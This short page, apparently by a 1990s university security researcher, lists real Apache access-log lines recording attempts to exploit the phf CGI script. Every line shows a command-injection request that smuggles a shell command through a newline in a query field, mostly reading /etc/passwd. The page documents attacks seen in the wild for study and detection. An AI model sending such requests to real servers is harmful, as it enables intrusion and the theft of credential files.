Example phf exploit attempts
These are from an actual Apache httpd access_log file:
m52bmi.dave-world.net - - [07/Jul/1996:23:57:23 -0700] "GET /cgi-bin/phf?QAlias=x%20/etc/ls%20/etc HTTP/1.0" 404 -
kairos.algonet.se - - [27/Oct/1996:09:00:33 -0800] "GET /cgi-bin/phf?Jserver=a&Qalias=a%0Aid HTTP/1.0" 500 -
kairos.algonet.se - - [27/Oct/1996:09:01:25 -0800] "GET /cgi-bin/phf?Jserver=a&Qalias=a%0Acat%20/etc/passwd HTTP/1.0" 500 -
ts-oc01-26.skyenet.net - - [03/Dec/1996:08:00:53 -0800] "GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
ts-oc01-26.skyenet.net - - [03/Dec/1996:08:01:21 -0800] "GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
ns - - [11/Feb/1997:06:18:21 -0800] "GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
ns - - [11/Feb/1997:06:19:32 -0800] "GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
ppp7-lj9-x.arnes.si - - [30/May/1997:06:10:30 -0700] "GET /cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0 HTTP/1.0" 500 -
1cust117.max31.atlanta.ga.ms.uu.net - - [11/Jun/1997:12:59:29 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
du168-250.ppp.algonet.se - - [05/Oct/1997:06:25:47 -0700] "GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
Dave Dittrich <dittrich@cac.washington.edu>
Last modified: Tue Apr 28 15:11:27 1998